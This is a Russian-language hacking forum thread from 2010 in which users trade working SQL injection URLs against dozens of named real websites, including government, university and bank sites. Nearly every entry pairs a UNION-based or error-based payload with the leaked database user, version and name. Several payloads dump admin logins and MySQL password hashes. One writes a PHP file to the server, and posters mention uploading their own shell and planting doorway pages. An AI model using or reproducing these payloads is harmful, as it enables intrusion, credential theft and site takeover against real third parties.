Database name: shlifwerst_shlifwerst
User name: shlifwerst_shlif@ns3.ukrnet.net
Os : Linux
Чо-то связанное с правительством малайзии. Нихуя не понял где что ибо всё на их языке.
http://dir.kedah.gov.my/info.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6%20--+
PR:5
Database Version: 5.0.77
Database name: berita
User name: root@localhost
Есть еще БДхи:
dbeppk
elog
information_schema
mufti
mysql
poll
sispen
smf
Вообщем хекайте
http://www.hrcc.org/member.php?id=-464+union+select+1,2,3,4,concat_ws(0x3a%20,user(), database(),version()),6,7,8,9,0,1,2,3,4,5,6,7,8
User: wwwhrcc@localhost
Version: 5.0.89-community
Database: wwwhrcc_hrcc
http://www.downtowncrossing.org/shop/shop.php?id=103+union+select+1,2,3,4--
Database Version: 5.0.81-log
Database name: db234342530
User name: dbo234342530@74.208.16.153
http://www.vanphathung.com/index.php?opt=user&act=prj&obj=info&id=-1%20UNION%20SELECt%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29%20--+
PR:5
User: vanphathun_CJXPD@localhost
Database: vanphathun_OIEW
Version: 5.0.67-community
CyberHunter
15.04.2010, 17:45
http://depts.washington.edu/chid/showprogram.php?id=19+union+select+1,2,3,4,5+--+
Version: 5.0.27-standard
User: browser@depts01.u.washington.edu
Database: chid
И вот еще одна:
http://art.uga.edu/people.php?id=19+union+select+1,2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17+--+
Кто может раскрутите до конца, а то что-то не получается :(
http://www.atomicforce.info/News.php?ID=-999%20UNION%20SELECT%201,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,3,4,5%20--+
PR:5
User: dbo251077112@212.227.127.134
Database: db251077112
Version: 4.0.27-max-log
http://konyvtar.barczi.elte.hu/index.php?page_ID=-16+union+select+1&attr_ID=3
user() : rgyfkweb
version() : 5.0.51a-24
database() : bggyk_honl
OS : Debian
-----------------------------------------------------------------------------
http://www.pernillesams.dk/emne.php?caseid=-233+union+select+1,2,3,4,5,6,7,8,9--
user() : cbupdate@web3.dmz.esoft.dk
version() : 5.0.84-log
database() : www_pernillesamsdk
OS : pc-linux-gnu
-----------------------------------------------------------------------------
http://www.logstor.com/showpage.php?pageid=-2135976+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48--
version() : 5.0.27-community-nt
OS : Windows
----------------------------------------------------------------------------
http://www.annonces-dz.com/index.php?catid=-192+union+select+1,2--
user() : annonces_classif@localhost
version() : 5.0.90-community-log
database() : annonces_dz
OS : Linux
есть таблица "adz_user"
----------------------------------------------------------------------------
http://www.icewarm.com.au/page.php?pId=-227+union+select+1,2,3--
user() : dbwwwadmin@localhost
version() : 4.1.21
database() : icewarm
OS : slackware-linux
---------------------------------------------------------------------------
http://www.bahamascoop.org/article.php?es_id=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
user() : coop_coop@localhost
version() : 5.0.90-community-log
database() : coop_bahamascoop
OS : Linux
---------------------------------------------------------------------------
http://www.destinations.com.bs/package.php?es_id=-63+union+select+1,null,3,2,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20--
user() : destinations@localhost
version() : 5.0.32-Debian_7etch6-log
database() : destinations_com_bs_-_cms
OS : Debian
есть таблицы "esnm_admin" "esnm_members"
--------------------------------------------------------------------------
http://www.mortarinvestments.eu/vehicle.php?id=-158+union+select+1,2,3,4,5,6,7,8--
user() : zbozi.mortarinvestments.eu@93.185.104.44
version() : 5.1.42-log
database() : zbozi_mortarinvestments_eu
OS : Linux
-------------------------------------------------------------------------
http://www.drinkaware.ie/index.php?sid=7&pid=-84+union+select+1,2,3,4,5,6,7--
user() : meas51_pixel@web5.hosting365.iem
version() : 5.0.45-community-log
database() : eas51_pixel
OS : pc-linux-gnu
результат в сорцах!
-------------------------------------------------------------------------
http://www.fourcourtspress.ie/product.php?intProductID=-292+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26--
user() : fourcou_easyedit@web11.hosting365.ie
version() : 5.0.45-community-log
database() : fourcou_easyedit
OS : pc-linux-gnu
-------------------------------------------------------------------------
http://www.mcaleesemarine.com/boat-spec.php?id=-1008005+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62
user() : qtnvyqvd_mcalees@localhost
version() : 4.1.22-standard
database() : qtnvyqvd_main
OS : pc-linux-gnu
есть таблица "users"
------------------------------------------------------------------------
http://www.atireland.ie/aaate/php/people.php?id=6+and+substring(version(),1,1)=3
version() : 3 :)
columns: 6
-----------------------------------------------------------------------
http://www.cultura2007.ro/document.php?doc=-2+union+select+1,2,3,4,5,6,7,8,9--
user() : root@localhost
version() : 5.0.22-community-nt
database() : cultura2007-ro
OS : Windows
-------------------------------------------------------------------------------
http://www.agenciapulsar.org/seccion.php?ids=-10+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
user() : agenciapulsar@192.168.0.180
version() : 5.0.22-log
database() : agenciapulsar
OS : pc-linux-gnu
есть таблица "piwik_user"
-------------------------------------------------------------------------------
http://www.cmtv.com.ar/biografia/show.php?bnid=-37+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18--
user() : uv5639@localhost
version() : 5.0.51a-log
database() : uv5639_cmtv_web
OS : Linux
-------------------------------------------------------------------------------
http://www.estaciontierra.com/artistas/artista.php?id=-36+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
user() : estacion_usuario@localhost
version() : 5.0.90-community
database() : estacion_estaciontierra
OS : Linux
http://www.venen-kur.info/index.php?id=1319&lang=-1%20UNION%20SELECT%201,2,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,4%20--+
User: dbo242799363@212.227.119.4
Database: db242799363
Version: 5.0.81-log
http://www.zipp.com/about/story.php?ID=-324+UNION+SELECT+1,2,3,4,5,6,7,8--
User: zipp@localhost
Version: 5.0.86
Database: Zipp
Google PR: 5
http://www.bzpower.com/story.php?ID=-2818+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
User: bzpower_bzpower@localhost
Version: 5.0.67-community
Database: bzpower_bzdatabase
Google PR: 5
ололо а понему спрашивали в разделе вопросы по уязвимостям :D Жееесть!!
Хз, хз. И гугл, и поиск по форуму молчат
http://www.thaiware.com/main/info.php?id=-100500%20UnIon+selECt+1,2,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36+--+
PR:6
User: 4ever@localhost
Database: thaiware
Version: 4.1.22
http://estanet.info/details.php?section=wtar&id=-9000%20UNION%20SELECT%201,concat_ws%280x3a,user%28 %29,database%28%29,version%28%29%29,3,4,5,6,7%20--+
User: root@localhost
Database: website_db
Version: 5.0.51a-community
http://www.globalaab.com/aab/info/info_information_look.php?id=-999%20UNION%20SELECT%201,2,3,concat_ws%280x3a,user %28%29,database%28%29,version%28%29%29,5,6,7,8,9,1 0,11,12,13,14,15,16,17%20--+
PR: 4
User: zm21d1@121.199.6.163
Database: zm21d1_db
Version: 4.0.27-log
http://www.chleb.info.pl/index.php?id=49%20UNION%20SELECT%201,2,concat_ws%2 80x3a,user%28%29,database%28%29,version%28%29%29,4 ,5%20--+
PR: 4
User: chleb_chleb@86.111.241.221
Database: chleb_chleb
Version: 5.0.90-log
http://www.sultan-backparadies.de/show_prod.php?id=-688+union+select+1,2,concat_ws(0x3a%20,user(),data base(),version()),4,5,6,7,8,9/*
User: v099757@localhost
Version: 4.0.24-Max-log
Database: v099757
http://www.iran-interlink.org/fa/?mod=view&id=-7183+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8,9--
iraninter@localhost:4.1.22:iraninterlink
http://www.discountcardubai.com/news_desc.php?id=-105+union+select+1,2,3,4,5,6--
user() : solitair_mdbuser@localhost
version() : 5.1.45-log
database() : solitair_discountdata
OS : CentOS
есть таблицы "admin" "member" (User_Name,Password) ;)
jecka3000
16.04.2010, 22:24
http://aspect.dubna.ru/english/news.php?id=-55+union+select+concat(version(),0x20,database(),0 x20,user())--
5.0.51a-log
aspect
aspect@localhost
http://sexicq.ru/topic.php?id=-61+union+select+1,concat(login,0x20,passw),3,4,5,6 ,7+from+user--
http://www.beaux-artsbrampton.com/members.php?id=999999+union+select+1,2,3,concat_ws (0x3a%20,user(),database(),version()),5,6,7,8,9--
User: beaux2_babadmin@localhost
Version: 5.0.89.
Database: beaux2_babdb
http://aquascope.ru/modules/wfsection/article.php?articleid=-288+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29/*
Database Version: 4.1.22-max-log
Database name: uaquas19
User name: uaquas19@68.178.254.187
Os : linux
http://www.islam.az/modules/sections/index.php?op=viewarticle
post
artid=19+and+1=2+union+select+1,2,uname,4,5,pass,7 ,8,9,email+from+rus_users
http://www.djjohnaskew.com/prev_playlists.php?ID=-196+union+select+1,concat_ws(0x3a%20,user(),databa se(),version()),3
User: dbo196056176@212.227.109.190
Version: 5.0.81-log
Database: db196056176
http://www.hbs-guu.ru/news.html?item_id=-74+UNION+SELECT+1,2,3,4,5,6--
User: hbs-guu@localhost
Version: 5.0.67-0ubuntu6.1-log
Database: hbs-guu
Google PR: 5
http://www.thaiware.com/main/info.php?id=-9307+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36--
User: 4ever@localhost
Version: 4.1.22
Database: thaiware
Google PR: 6
http://www.smeda.org/info.php?id=-207+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--
User: root@localhost
Version: 5.0.90-log
Database: smeda_main01
Google PR: 6
-=ASSKAKO=-
17.04.2010, 14:15
http://maxitime.ru/watches.phtml?idb=19&go=gop&pol=&idl=2481+union+select+1,2,3,4,5,6,USER(),8,9,datab ase(),version(),12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29--
User: bestwatch@localhost
Version: 5.0.90-log
Database: bestwatch
http://fei.idgu.edu.ua/info.php?sp=9+union+select+1,2,group_concat%28tabl e_name%29,4+from+information_schema.tables--
BrainDeaD
17.04.2010, 19:13
ну что-ж, поддержим сегодня религиозную тему))
http://www.russk.ru/viewmessage.php?id=166990+union+select+1,database( ),3,version(),user(),6%20--
database: rusk
version: rusk_site@localhost
user: 5.0.51a-log
pr: 4
http://www.sotchi-2014.info/content.php?id=248%27%20UNION%20SELECT%20concat_ws %280x3a,user%28%29,database%28%29,version%28%29%29 %20--+
User: Uwww4973S@localhost
Database: udb4973
Version: 4.0.26-log
jecka3000
18.04.2010, 00:47
http://www.kosherconnection.com/memberinfo.php?id=-123+union+select+1,concat(username,0x20,password), 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23+from+jos_users--
http://www.oiwsba.com/oiwsba/memberinfo.php?id=-44+union+select+1,concat(username,0x20,password),3 ,4,5,6,7,8,9,10,11,12+from+members--
http://www.wfsj.org/blogs/wfsj/post.php?id=-101+union+select+1,2,3,4,5,concat(version(),0x20,d atabase(),0x20,user()),7,8,9--
5.1.26-rc-5.1.26rc
db70882_wfsj_org
db70882_wfsj@70.32.68.18
http://lotakambal.sristisukh.com/post.php?id=-823+union+select+concat(version(),0x20,database(), 0x20,user()),2,3,4,5,6,7--
http://www.thegotomom.com/blog-post.php?id=-108+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5--
5.0.90-community
thegotom_momdb
thegotom_momdb@localhost
http://www.centraldev.net/post.php?id=-61+union+select+1,concat(user_login,0x20,user_pass ),3,4,5,6,7,8,9,10+from+wp_users--
http://www.spsptrainingcommittee.org/post.php?id=-1+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4--
5.0.67.d7-ourdelta-log
spsptraining
spsptraining@72.167.183.60
http://www.codepinkmaui.org/post.php?id=-18+union+select+1,concat(version(),0x20,database() ,0x20,user()),3,4,5,6,7,8--
5.0.90-community
maui_pink
maui_pink@localhost
http://www.7courier.com/shopping.php?id=-27+union+select+concat(version(),0x20,database(),0 x20,user()),2,3,4,5,6,7--
5.1.45-log
sevcouri_7couri
sevcouri_sevc@localhost
http://nocona.org/shopping.php?id=-1+union+select+1,2,concat(version(),0x20,database( ),0x20,user()),4,5,6,7,8,9--
4.0.16-nt
nocona
nocona@webserver2
http://www.iblist.com/users/profile_view.php?id=361+union+select+1,concat(vers ion(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22--
http://www.analisi.ru/info.php?id=-1%20UNION%20SELECT%201,concat_ws%280x3a,user%28%29 ,database%28%29,version%28%29%29,3,4%20--+
User: analisi@localhost
Database: analisi
Version: 5.0.45
http://www.shadowlocked.com/news2/news_shadowlocked.php?ID=-75+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12 ,13,14--&CAT=FILM
User: slnewsuser@localhost
Version: 5.0.45
Database: slnews
Google PR: 5
http://www.snseurope.com/snslink/news/news-full.php?id=-13519+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29 ,version%28%29,database%28%29%29,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20--
User: eurohs@server213-171-218-212.livedns.org.uk
Version: 5.0.77
Database: eurohs
Google PR: 4
http://www.mynhw.co.uk/news-full.php?id=-644+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,v ersion%28%29,database%28%29%29,4,5,6,7,8,9,10,11,1 2,13--
User: sniasuper@server213-171-218-159.livedns.org.uk
Version: 5.0.45
Database: SNIA
Google PR: 7
http://www.gamesonlinepro.com/full.php?id=6557+UNION+SELECT+1,2,concat_ws%280x3a ,user%28%29,version%28%29,database%28%29%29,4--
User: kitamura@ip-208-109-198-26.ip.secureserver.net
Version: 5.0.45-log
Database: gamesonlinepro
Данные можно увидеть через исходный код...
http://www.thaiware.com/main/info.php?id=-999%20UNION%20SELECT%201,2,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36%20--+
PR: 6
User: 4ever@localhost
Database: thaiware
Version: 4.1.22
http://www.bmprocess.ru/equipment/spb?info&id=-100%20UNION%20SELECT%201,concat_ws%280x3a,user%28% 29,database%28%29,version%28%29%29,3,4%20--+
User: u39424@10.10.223.214
Database: u39424_bmp
Version: 5.0.67-log
Если кому интересно, большинство сайтов тицастые и пиаристые.
---1---
http://www.ogirk.ru/news/2010-04-12/-golos'+union+select+1,2,concat(login,0x3a,pass),4, 5,6,7,8,9,10,11,12,13,14,15,16+from+users--+.html
кабинет присутствует.
---2 : сайт какой-то фирмы---
http://perfectseo.ru/linker/reception_title.php?c=1'+or(1,1)=(select+count(*), concat((select+concat_ws(0x3a,email,password,name, user_group)+from+dimigo_users+LIMIT+0,1),floor(ran d(0)*2))from(information_schema.tables)+GROUP+BY+2 )--+
Нашел эту фирму по оставленому от них бекдору. Естественно их я удалил, багу закрыл, своё залил. (:
---3---
http://www.sosedi.perm.ru/rubriks.php?n=-1'+union+select+1,group_concat(version(),0x3a,user (),0x3a,database())--+
5.0.51a-log
alphaoboz_sosed@localhost
alphaoboz_sosed
---4---
http://ad-auto.ru/detail.php?siteid=-16186+union+select+1,2,group_concat(column_name),4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,5 6,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72, 73,74+from+information_schema.columns+where+table_ name='user'
Вывод в титле, кто не заметил.
---5---
http://olympicgames.com.ua/archive.phtml?id_rubric=-229+union+select+group_concat(version(),0x3a,user( ),0x3a,database())--+
5.0.45-log
olympicgames@192.168.11.56
olympicgames
---6---
http://www.audit.by/new/?news_id=-487+union+select+1,2,3,4,5,group_concat(version(), 0x3a,user(),0x3a,database()),7--+
4.0.24_Debian-10sarge2-log
auditby2@localhost
auditby2
---7---
http://biz.podolsk.ru/rate.php?id=1+union+select+group_concat(version(), 0x3a,user(),0x3a,database())
5.1.40
bizadmin@localhost
bizadmin
---8---
http://carlson.ru/aerography.php?service=-469'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,group_concat(table_name,0x3a,column_name),16,17,1 8,19,20,21,22,23+from+information_schema.columns+w here+column_name+like+'%pass%'--+
---9---
http://www.ulif.mon.gov.ua/ulif/?mov=runnew&id_run=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,usename+fr om+pg_user+where+usename=user+and+usesuper=$$true$ $--
---10---
http://www.russ-tur.ru/transit-tours/-35125%27+union+select+1,2,3,4,5,6,7,8,9,10,group_c oncat(version(),0x3a,user(),0x3a,database()),12,13--+.html
5.0.67
u11295@78.108.81.201
b11295_2
---11---
http://www.e3e5.com/articles.php?lang=0§ion=14+and+1=cast%28%28SELECT+version%28%29||c hr%2858%29||user||chr%2858%29||current_database%28 %29+from+information_schema.columns+limit+1+offset +0%29+as+int%29
---12---
http://www.dorogajizni.ru/?action=show&id=12762+and+1=cast%28%28SELECT+version%28%29||chr %2858%29||user||chr%2858%29||current_database%28%2 9+from+information_schema.columns+limit+1+offset+0 %29+as+int%29
---13 : банк 400 тиц---
http://www.econombank.ru/banner/nsclick.php?id=1+or+%281,1%29=%28select+count%280% 29,concat%28version%28%29,floor%28rand%280%29*2%29 %29from%28st_banner_shows%29GROUP+BY+2%29--+
---14---
http://www.obyava.ru/index.php?settown=%C2%F1%E5+%F0%E5%E3%E8%EE%ED%FB% 27+union+select+1,group_concat(version(),0x3a,user (),0x3a,database()),3,4,5,6,7,8,9,10,11,12--+
5.0.41-log
obyava@localhost
auto
---15---
Можно заливать через двойной запрос.
http://www.richtime.ru/?select=catalogue&model_id=-00014722+union+select+1,2,3,4,5,0x35372720756e696f 6e2073656c656374203120696e746f206f757466696c65202f 7661722f7777772f6874646f63732f616e7469636861742e72 752f746573742e70687027202d2d20,7,8,9,10,11,12,13,1 4,15,16,17,18+from+mysql.user
---16---
http://www.kiteworld.ru/kitelist.php?Id=1&MultiId=-1+union+select+version()--+
4.1.25-log
kiteworl@fe45.hc.ru
wwwkiteworldru
---17 : 1400 тиц---
http://www.etver.ru/job/index.php?go=vacancy&action=detail&id=-4364+union+select+1,2,3,4,5,group_concat%28table_n ame,0x3a,column_name%29,7,8,9,10,11+from+informati on_schema.columns+where+column_name+like+0x2570617 37325--+
---18 : подарок для наркоманов, проституток и кардеров---
https://www.rivercitybankonline.com/event_page.php?evt_id=mxzxpurjn&mode=r&poll_id=-14+union+select+1,2,group_concat(user,0x3a,passwor d,0x3a,file_priv,0x3a,host)+from+mysql.user--+
---19 : едушка---
http://www.augustana.edu/prebuilt/acal/event.php?mode=js&eventid=1+union+select+1,group_concat(user,0x3a,pa ssword,0x3a,file_priv),3,4,5,6,7,8,9+from+mysql.us er--+
---20 : сами знаете для кого)---
Вроде центральный банк Ганы, вроде есть админка и пользователи. Pr 6, можно загнать пару доров, траст как-бы есть :), а можно что-то другое сделать :P
http://www.bog.gov.gh/index1.php?linkid=65&archiveid=1452+and+1=0+union+select+group_concat(t able_name,0x3a,column_name),222+from+information_s chema.columns+where+column_name+like+0x25706173732 5--+&page=1&adate=23%2F03%2F2010
---21---
http://events.plu.edu/show-event.php?event_id=1039695+union+select+1,group_co ncat(user,0x3a,password,0x3a,file_priv,0x3a,host), 3,4+from+mysql.user--+
---22 : загнал функцию---
http://www.muztorg.ua/catalog/?id=-1+union+select+%28proxywork%28$$func$$%29::text%29 +from+pg_user+LIMIT+1+OFFSET+0--
user - muztorg.attrade bd - ua.attrade version - PostgreSQL 8.2.9 on x86_64-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)
---23---
Пароли вроде как подходят.
http://nano.stanford.edu/model.php?id=-23+union+select+1,2,3,group_concat%28name,0x3a,use rname,0x3a,password,0x3a,access_levels%29,5,6,7,8, 9,10+from+manage_admins+where+access_levels=0x416c 6c--+
---24---
view-source:http://www.gretta.ru/?part=item&cat=1&iid=-1%27+union+select+111,222,333,444,group_concat%28l ogin,0x3a,pass%29+from+admin--+
---25 : Игра---
Так
http://download.beyondunreal.com/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+1,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--+
или так
view-source:http://download.beyondunreal.com/browse.php?cat=5'+and+1=0+union+select+111,222,333 ,concat_ws(version(),0x3a,database(),0x3a,user()), 555,666+from+--+
Красивый у них mail...
http://mail.beyondunreal.com/
5.0.51b-log
fusion
fusion@ginger
---26---
http://www.tvdata.ru/allpartners.php?id=-12+union+select+1,concat_ws(0x3a,user,password,fil e_priv),3,4,5,6,7,8,9,10,11,12+from+mysql.user--
(с)v1d0q
[Feldmarschall]
18.04.2010, 21:21
http://www.gigantiaclan.at/index/index.php?site=files&cat=-5%27+OR+1=1/*
MySQL Version: 5.1.41
http://www.ikwilhelpen.be/iwh/action.php?aid=-1048+union+select+1,2,aes_decrypt(aes_encrypt(conc at(user(),version(),database(),@@version_compile_o s),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,3 6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 ,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,8 6,87,88,89,90,91,92,93,94,95,96,97+from+user--
так мало колонок никогда не видал =)
http://www.vintagevirginiaapples.com/Shop_Show_product.php?Product_Id=248+union+select+ 1,2,3,4,5,6,7--
Database Version: 4.1.22
Database name: apples
User name: apples@localhost
http://www.bkik.hu/euinfo/showprojects.php?nid=22+union+all+sele ct+1,2, 3,4--
Version : MysqL 4.1
http://www.search.uz/review.php?sid=-317104+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a %20,user(),database(),version()),10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38
User: searchu_se@localhost
Version: 5.0.85-community
Database: searchu_se
http://www.shoppingcenter.ru/catalog/index_category.php?categoryId=6+UNION+SELECT+conca t_ws(0x3a,version(),database(),user(),@@version_co mpile_os)--%20&parentId=0&begin=0
Database Version: 5.0.77
Database name: arhicom_sc
User name: arhicom_sc.shopp@localhost
Os : Linux
http://www.uh.edu/news-events/newsrelease.php?releaseid_int=-239+union+select+1,concat_ws(0x3a%20,user(),databa se(),version()),3,4,5,6,7,8--
User: newsUser@europa.matrix.uh.edu
Version: 4.1.16standard-log
Database: uhnews
Google PR: 7
http://www.aaaahotels.com/detail.php?id=-535+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29 ,version%28%29,database%28%29%29,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24--
User: aaaahotels@localhost
Version: 5.0.32-Debian_7etch11-log
Database: aaaahotels_com
Google PR: 5
http://www.evergreenrecreation.com/facilities.php?id=-10+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7,8,9,10,11,12--
User: db49768@72.47.224.26
Version: 5.0.51a-24+lenny1
Database: db49768_eprd
Google PR: 4
http://www.eamesgallery.com/cart/prod_subcat.php?id=-4+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws%280x 3a,user%28%29,version%28%29,database%28%29%29,12,1 3--
User: eamesgal@localhost
Version: 4.0.27-standard
Database: eamesgal_eostore
Google PR: 6
http://encycl.anthropology.ru/article.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,conc at_ws%280x3a,user%28%29,version%28%29,database%28% 29%29,10--
User: anthropo_visitor@localhost
Version: 5.0.90-community-log
Database: anthropo_encycl
Google PR: 5
http://www.fondsk.ru/article.php?id=-1529+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws%280x3a ,user%28%29,version%28%29,database%28%29%29,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30--Мб повторяюсь...!
User: u32888@10.10.10.224
Version: 5.0.67-log
Database: u32888
Google PR: 5
http://www.stots.edu/article.php?id=-25+UNION+SELECT+1,2,concat_ws%280x3a,user%28%29,ve rsion%28%29,database%28%29%29,4,5,6,7,8--
User: pe@localhost
Version: 4.1.22-standard
Database: stots_pe
Google PR: 6
продолжение этого поста:
http://uasc.org.ua/2010/04/знімаємо-капелюха-redhat-sql-inj/comment-page-1/#comment-504
http://www.es.redhat.com/news/article/3027+and+5=4+union+select+1,2,concat_ws(0x3a,user( ),version(),database()),4,5,6,7,8,9,10,11,12,13.ht ml
user(): www@localhost
version(): 5.0.77-log
database(): redhateurope
для любителей анимэ
http://www.ranmaspb.ru/?t=news&sm=newsarhiv&nsid=-178/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,aes_decrypt(aes_encrypt(concat_ws(0x3a,@ @version,user(),database(),@@version_compile_os),0 x71),0x71),7--
version:5.0.90
user:ranmaspbru@78.108.81.111
database:ranmaspbru
os : portbld-freebsd8.0
форум рабочий
street16
20.04.2010, 21:40
http://www.santech.ru/katalog/cards.php3?gid=-2%20uni on%20select%201,ve rsion()/*
4.0.27-log
radioplovdiv.bg
http://www.radioplovdiv.bg/index2.php?content=interview&id=-289+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6--
User:radiopd_radio@localhost
Database:radiopd_rrs
Version:5.0.85-community-log
PR5
http://www.e-chari.net/index.php?page=fiche&id=-24 union all select 1,concat_ws(0x3a,user(),database(),ver sion()),3,4,5, 6,7,8,9,10,11,12,13--
User : echariDB@imu209.infomaniak.ch
Database : echarinet
Version : 5.0.84-log
http://www.chamberofcommerce.org.lr/getcompanyinfo.php?id=-205 union select 1,concat_ws(0x3a,user(),datab ase(),version()),3,4,5,6,7, 8,9--
User : chamberofcom@76.12.91.164
Database : chamberofcom
Version : 5.0.77
http://marketliberia.com/directory/getcompanyinfo.php?id=3&cat_id=-24 union select 1,con cat_ws(0x3a,user(),dat abase(),version()),3--
User : mojgovlr_market@localhost
Database : mojgovlr_marketliberia
Version : 5.1.45-log
http://www.agpgabon.ga/show_article.php?IDActu=-7250 union select 1,concat_ws(0x3a,user(),datab ase(),version()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17, 18,19,20,21,22,23,24,25--
User : tzue@localhost
Database :agpgabon
Version : 5.1.45-0.dotdeb.0-log
http://www.mfrchallans.fr/actualite.php?idactu=39 union select 1,2,concat_ws(0x3a,user(),databa se(),version()),4,5,6, 7,8,9,10,11,12,13--
User : mfrchallansfr@88.191.253.148
Database :mfrchallansfr
Version : 5.0.51a-3ubuntu5.4-log
http://www.protomed.fr/en/popup_actu.php?idactu=-41 union select 1,concat_ws(0x3a,datab ase(),user(),ve rsion()),3,4,5,6--
User : protomed@localhost:5.0.32
Database : protomed_biome
Version : Debian_7etch8-log
http://mp3hungama.com/music/genre_albums.php?id=-1+or(1,1)=(select+count(0),concat((select+database ()+from+information_schema.tables+limit+0,1),floor (rand(0)*2))from(information_schema.tables)group+b y+2)--+
http://www.bestline.ru/index.html?get=catalogue§ion=-2650+union+all+select+1,aes_decrypt(aes_encrypt(co ncat_ws(0x3a,@@version,user(),database(),@@version _compile_os),0x71),0x71)--&_sid=a532ac911c929be8407efd60bab3e0d3#2650
version: 4.1.25-log
user: bestline@localhost
database: wwwbestlineru
os : portbld-freebsd6.2
CyberHunter
21.04.2010, 17:50
http://kvazar-ufa.ru/page.php?id=-45+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16+--+
User: kvazar@localhost
Version: 5.0.77
Database: kvazar
http://www.merit.unu.edu/hfc/article.php?nid=-3+union+select+1,concat_ws(0x3a%20,user(),database (),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
User : hfc@localhost
Database : hfc:
Version : 5.0.51a-24+lenny3
http://www.dk-spb.ru/homebook.php?part=contact&idsub=77+UNION+SELECT+CONCAT_WS(CHAR(32,58,32),use r(),database(),version())--
dbu_domknigi_1@192.168.5.56 : db_domknigi_1 : 5.0.77-log
http://www.telemarket.com.ua/index.php?productID=0+UNION+SELECT+CONCAT_WS%28CHA R%2832,58,32%29,user%28%29,database%28%29,version% 28%29%29
alexsor@localhost : telemarket : 5.0.67-log
nemaniak
21.04.2010, 19:30
softwarepublico.gob.pe PR-7
http://www.softwarepublico.gob.pe/res/detResolucion.php?tipodoc_id=-6+union+select+concat_ws(0x3a,version(),user(),dat abase())+--+
4.1.22-standard:software_soft@localhost:software_publico
ihscslnews.org
http://ihscslnews.org/view_article.php?id=-283+union+select+1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6,7
